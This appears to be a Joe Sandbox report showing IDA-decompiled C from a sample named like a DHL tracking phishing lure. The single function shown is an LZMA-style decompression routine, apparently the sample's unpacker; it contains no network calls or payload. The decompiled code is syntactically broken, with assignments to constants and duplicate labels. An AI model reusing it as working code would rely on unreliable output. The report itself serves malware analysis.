                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                    • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                    • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                    • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E004062EB() {
                    				signed int _t539;
                    				unsigned short _t540;
                    				signed int _t541;
                    				void _t542;
                    				signed int _t543;
                    				signed int _t544;
                    				signed int _t573;
                    				signed int _t576;
                    				signed int _t597;
                    				signed int* _t614;
                    				void* _t621;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t621 - 0x40) != 1) {
                    						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                    						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                    						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                    						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                    						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                    						_t539 =  *(_t621 - 4) + 0x664;
                    						 *(_t621 - 0x58) = _t539;
                    						goto L68;
                    					} else {
                    						 *(__ebp - 0x84) = 8;
                    						while(1) {
                    							L132:
                    							 *(_t621 - 0x54) = _t614;
                    							while(1) {
                    								L133:
                    								_t540 =  *_t614;
                    								_t597 = _t540 & 0x0000ffff;
                    								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                    								if( *(_t621 - 0xc) >= _t573) {
                    									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                    									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                    									 *(_t621 - 0x40) = 1;
                    									_t541 = _t540 - (_t540 >> 5);
                    									 *_t614 = _t541;
                    								} else {
                    									 *(_t621 - 0x10) = _t573;
                    									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                    									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                    								}
                    								if( *(_t621 - 0x10) >= 0x1000000) {
                    									goto L139;
                    								}
                    								L137:
                    								if( *(_t621 - 0x6c) == 0) {
                    									 *(_t621 - 0x88) = 5;
                    									L170:
                    									_t576 = 0x22;
                    									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                    									_t544 = 0;
                    									L172:
                    									return _t544;
                    								}
                    								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                    								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                    								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                    								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                    								L139:
                    								_t542 =  *(_t621 - 0x84);
                    								while(1) {
                    									 *(_t621 - 0x88) = _t542;
                    									while(1) {
                    										L1:
                    										_t543 =  *(_t621 - 0x88);
                    										if(_t543 > 0x1c) {
                    											break;
                    										}
                    										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                    											case 0:
                    												if( *(_t621 - 0x6c) == 0) {
                    													goto L170;
                    												}
                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                    												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                    												_t543 =  *( *(_t621 - 0x70));
                    												if(_t543 > 0xe1) {
                    													goto L171;
                    												}
                    												_t547 = _t543 & 0x000000ff;
                    												_push(0x2d);
                    												asm("cdq");
                    												_pop(_t578);
                    												_push(9);
                    												_pop(_t579);
                    												_t617 = _t547 / _t578;
                    												_t549 = _t547 % _t578 & 0x000000ff;
                    												asm("cdq");
                    												_t612 = _t549 % _t579 & 0x000000ff;
                    												 *(_t621 - 0x3c) = _t612;
                    												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                    												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                    												_t620 = (0x300 << _t612 + _t617) + 0x736;
                    												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                    													L10:
                    													if(_t620 == 0) {
                    														L12:
                    														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                    														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                    														goto L15;
                    													} else {
                    														goto L11;
                    													}
                    													do {
                    														L11:
                    														_t620 = _t620 - 1;
                    														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                    													} while (_t620 != 0);
                    													goto L12;
                    												}
                    												if( *(_t621 - 4) != 0) {
                    													GlobalFree( *(_t621 - 4));
                    												}
                    												_t543 = GlobalAlloc(0x40, 0x600); // executed
                    												 *(_t621 - 4) = _t543;
                    												if(_t543 == 0) {
                    													goto L171;
                    												} else {
                    													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                    													goto L10;
                    												}
                    											case 1:
                    												L13:
                    												__eflags =  *(_t621 - 0x6c);
                    												if( *(_t621 - 0x6c) == 0) {
                    													 *(_t621 - 0x88) = 1;
                    													goto L170;
                    												}
                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                    												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                    												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                    												_t45 = _t621 - 0x48;
                    												 *_t45 =  *(_t621 - 0x48) + 1;
                    												__eflags =  *_t45;
                    												L15:
                    												if( *(_t621 - 0x48) < 4) {
                    													goto L13;
                    												}
                    												_t555 =  *(_t621 - 0x40);
                    												if(_t555 ==  *(_t621 - 0x74)) {
                    													L20:
                    													 *(_t621 - 0x48) = 5;
                    													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                    													goto L23;
                    												}
                    												 *(_t621 - 0x74) = _t555;
                    												if( *(_t621 - 8) != 0) {
                    													GlobalFree( *(_t621 - 8));
                    												}
                    												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                    												 *(_t621 - 8) = _t543;
                    												if(_t543 == 0) {
                    													goto L171;
                    												} else {
                    													goto L20;
                    												}
                    											case 2:
                    												L24:
                    												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                    												 *(_t621 - 0x84) = 6;
                    												 *(_t621 - 0x4c) = _t562;
                    												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                    												goto L132;
                    											case 3:
                    												L21:
                    												__eflags =  *(_t621 - 0x6c);
                    												if( *(_t621 - 0x6c) == 0) {
                    													 *(_t621 - 0x88) = 3;
                    													goto L170;
                    												}
                    												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                    												_t67 = _t621 - 0x70;
                    												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                    												__eflags =  *_t67;
                    												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                    												L23:
                    												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                    												if( *(_t621 - 0x48) != 0) {
                    													goto L21;
                    												}
                    												goto L24;
                    											case 4:
                    												L133:
                    												_t540 =  *_t614;
                    												_t597 = _t540 & 0x0000ffff;
                    												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                    												if( *(_t621 - 0xc) >= _t573) {
                    													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                    													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                    													 *(_t621 - 0x40) = 1;
                    													_t541 = _t540 - (_t540 >> 5);
                    													 *_t614 = _t541;
                    												} else {
                    													 *(_t621 - 0x10) = _t573;
                    													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                    													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                    												}
                    												if( *(_t621 - 0x10) >= 0x1000000) {
                    													goto L139;
                    												}
                    											case 5:
                    												goto L137;
                    											case 6:
                    												__edx = 0;
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x34) = 1;
                    													 *(__ebp - 0x84) = 7;
                    													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    													L132:
                    													 *(_t621 - 0x54) = _t614;
                    													goto L133;
                    												}
                    												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    												__esi =  *(__ebp - 0x60);
                    												__cl = 8;
                    												__cl = 8 -  *(__ebp - 0x3c);
                    												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    												__ecx =  *(__ebp - 0x3c);
                    												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    												__ecx =  *(__ebp - 4);
                    												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    												__eflags =  *(__ebp - 0x38) - 4;
                    												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    												if( *(__ebp - 0x38) >= 4) {
                    													__eflags =  *(__ebp - 0x38) - 0xa;
                    													if( *(__ebp - 0x38) >= 0xa) {
                    														_t98 = __ebp - 0x38;
                    														 *_t98 =  *(__ebp - 0x38) - 6;
                    														__eflags =  *_t98;
                    													} else {
                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    													}
                    												} else {
                    													 *(__ebp - 0x38) = 0;
                    												}
                    												__eflags =  *(__ebp - 0x34) - __edx;
                    												if( *(__ebp - 0x34) == __edx) {
                    													__ebx = 0;
                    													__ebx = 1;
                    													goto L61;
                    												} else {
                    													__eax =  *(__ebp - 0x14);
                    													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    													__eflags = __eax -  *(__ebp - 0x74);
                    													if(__eax >=  *(__ebp - 0x74)) {
                    														__eax = __eax +  *(__ebp - 0x74);
                    														__eflags = __eax;
                    													}
                    													__ecx =  *(__ebp - 8);
                    													__ebx = 0;
                    													__ebx = 1;
                    													__al =  *((intOrPtr*)(__eax + __ecx));
                    													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    													goto L41;
                    												}
                    											case 7:
                    												goto L0;
                    											case 8:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x84) = 0xa;
                    													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    												} else {
                    													__eax =  *(__ebp - 0x38);
                    													__ecx =  *(__ebp - 4);
                    													__eax =  *(__ebp - 0x38) + 0xf;
                    													 *(__ebp - 0x84) = 9;
                    													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    												}
                    												while(1) {
                    													L132:
                    													 *(_t621 - 0x54) = _t614;
                    													goto L133;
                    												}
                    											case 9:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													goto L89;
                    												}
                    												__eflags =  *(__ebp - 0x60);
                    												if( *(__ebp - 0x60) == 0) {
                    													goto L171;
                    												}
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                    												__eflags = _t258;
                    												0 | _t258 = _t258 + _t258 + 9;
                    												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                    												goto L75;
                    											case 0xa:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 4);
                    													__ecx =  *(__ebp - 0x38);
                    													 *(__ebp - 0x84) = 0xb;
                    													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    													while(1) {
                    														L132:
                    														 *(_t621 - 0x54) = _t614;
                    														goto L133;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x28);
                    												goto L88;
                    											case 0xb:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__ecx =  *(__ebp - 0x24);
                    													__eax =  *(__ebp - 0x20);
                    													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												} else {
                    													__eax =  *(__ebp - 0x24);
                    												}
                    												__ecx =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												L88:
                    												__ecx =  *(__ebp - 0x2c);
                    												 *(__ebp - 0x2c) = __eax;
                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    												L89:
                    												__eax =  *(__ebp - 4);
                    												 *(__ebp - 0x80) = 0x15;
                    												__eax =  *(__ebp - 4) + 0xa68;
                    												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    												goto L68;
                    											case 0xc:
                    												L99:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xc;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t334 = __ebp - 0x70;
                    												 *_t334 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t334;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												__eax =  *(__ebp - 0x2c);
                    												goto L101;
                    											case 0xd:
                    												L37:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xd;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t122 = __ebp - 0x70;
                    												 *_t122 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t122;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L39:
                    												__eax =  *(__ebp - 0x40);
                    												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    													goto L48;
                    												}
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													goto L54;
                    												}
                    												L41:
                    												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    												__ecx =  *(__ebp - 0x58);
                    												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    												 *(__ebp - 0x48) = __eax;
                    												__eax = __eax + 1;
                    												__eax = __eax << 8;
                    												__eax = __eax + __ebx;
                    												__esi =  *(__ebp - 0x58) + __eax * 2;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edx = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													 *(__ebp - 0x40) = 1;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													__ebx = __ebx + __ebx + 1;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edx;
                    													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L39;
                    												} else {
                    													goto L37;
                    												}
                    											case 0xe:
                    												L46:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xe;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t156 = __ebp - 0x70;
                    												 *_t156 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t156;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												while(1) {
                    													L48:
                    													__eflags = __ebx - 0x100;
                    													if(__ebx >= 0x100) {
                    														break;
                    													}
                    													__eax =  *(__ebp - 0x58);
                    													__edx = __ebx + __ebx;
                    													__ecx =  *(__ebp - 0x10);
                    													__esi = __edx + __eax;
                    													__ecx =  *(__ebp - 0x10) >> 0xb;
                    													__ax =  *__esi;
                    													 *(__ebp - 0x54) = __esi;
                    													__edi = __ax & 0x0000ffff;
                    													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    													__eflags =  *(__ebp - 0xc) - __ecx;
                    													if( *(__ebp - 0xc) >= __ecx) {
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    														__cx = __ax;
                    														_t170 = __edx + 1; // 0x1
                    														__ebx = _t170;
                    														__cx = __ax >> 5;
                    														__eflags = __eax;
                    														 *__esi = __ax;
                    													} else {
                    														 *(__ebp - 0x10) = __ecx;
                    														0x800 = 0x800 - __edi;
                    														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    														__ebx = __ebx + __ebx;
                    														 *__esi = __cx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													 *(__ebp - 0x44) = __ebx;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														continue;
                    													} else {
                    														goto L46;
                    													}
                    												}
                    												L54:
                    												_t173 = __ebp - 0x34;
                    												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    												__eflags =  *_t173;
                    												goto L55;
                    											case 0xf:
                    												L58:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0xf;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t203 = __ebp - 0x70;
                    												 *_t203 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t203;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L60:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													L55:
                    													__al =  *(__ebp - 0x44);
                    													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    													goto L56;
                    												}
                    												L61:
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t217 = __edx + 1; // 0x1
                    													__ebx = _t217;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													goto L60;
                    												} else {
                    													goto L58;
                    												}
                    											case 0x10:
                    												L109:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0x10;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t365 = __ebp - 0x70;
                    												 *_t365 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t365;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												goto L111;
                    											case 0x11:
                    												L68:
                    												_t614 =  *(_t621 - 0x58);
                    												 *(_t621 - 0x84) = 0x12;
                    												while(1) {
                    													L132:
                    													 *(_t621 - 0x54) = _t614;
                    													goto L133;
                    												}
                    											case 0x12:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													__eax =  *(__ebp - 0x58);
                    													 *(__ebp - 0x84) = 0x13;
                    													__esi =  *(__ebp - 0x58) + 2;
                    													while(1) {
                    														L132:
                    														 *(_t621 - 0x54) = _t614;
                    														goto L133;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x4c);
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    												__ecx =  *(__ebp - 0x58);
                    												__eax =  *(__ebp - 0x4c) << 4;
                    												__eflags = __eax;
                    												__eax =  *(__ebp - 0x58) + __eax + 4;
                    												goto L130;
                    											case 0x13:
                    												__eflags =  *(__ebp - 0x40);
                    												if( *(__ebp - 0x40) != 0) {
                    													_t469 = __ebp - 0x58;
                    													 *_t469 =  *(__ebp - 0x58) + 0x204;
                    													__eflags =  *_t469;
                    													 *(__ebp - 0x30) = 0x10;
                    													 *(__ebp - 0x40) = 8;
                    													L144:
                    													 *(__ebp - 0x7c) = 0x14;
                    													goto L145;
                    												}
                    												__eax =  *(__ebp - 0x4c);
                    												__ecx =  *(__ebp - 0x58);
                    												__eax =  *(__ebp - 0x4c) << 4;
                    												 *(__ebp - 0x30) = 8;
                    												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    												L130:
                    												 *(__ebp - 0x58) = __eax;
                    												 *(__ebp - 0x40) = 3;
                    												goto L144;
                    											case 0x14:
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    												__eax =  *(__ebp - 0x80);
                    												 *(_t621 - 0x88) = _t542;
                    												goto L1;
                    											case 0x15:
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xb;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    												goto L120;
                    											case 0x16:
                    												__eax =  *(__ebp - 0x30);
                    												__eflags = __eax - 4;
                    												if(__eax >= 4) {
                    													_push(3);
                    													_pop(__eax);
                    												}
                    												__ecx =  *(__ebp - 4);
                    												 *(__ebp - 0x40) = 6;
                    												__eax = __eax << 7;
                    												 *(__ebp - 0x7c) = 0x19;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L145;
                    											case 0x17:
                    												L145:
                    												__eax =  *(__ebp - 0x40);
                    												 *(__ebp - 0x50) = 1;
                    												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    												goto L149;
                    											case 0x18:
                    												L146:
                    												__eflags =  *(__ebp - 0x6c);
                    												if( *(__ebp - 0x6c) == 0) {
                    													 *(__ebp - 0x88) = 0x18;
                    													goto L170;
                    												}
                    												__ecx =  *(__ebp - 0x70);
                    												__eax =  *(__ebp - 0xc);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												_t484 = __ebp - 0x70;
                    												 *_t484 =  *(__ebp - 0x70) + 1;
                    												__eflags =  *_t484;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    												L148:
                    												_t487 = __ebp - 0x48;
                    												 *_t487 =  *(__ebp - 0x48) - 1;
                    												__eflags =  *_t487;
                    												L149:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													__ecx =  *(__ebp - 0x40);
                    													__ebx =  *(__ebp - 0x50);
                    													0 = 1;
                    													__eax = 1 << __cl;
                    													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    													__eax =  *(__ebp - 0x7c);
                    													 *(__ebp - 0x44) = __ebx;
                    													while(1) {
                    														 *(_t621 - 0x88) = _t542;
                    														goto L1;
                    													}
                    												}
                    												__eax =  *(__ebp - 0x50);
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    												__eax =  *(__ebp - 0x58);
                    												__esi = __edx + __eax;
                    												 *(__ebp - 0x54) = __esi;
                    												__ax =  *__esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													__cx = __ax >> 5;
                    													__eax = __eax - __ecx;
                    													__edx = __edx + 1;
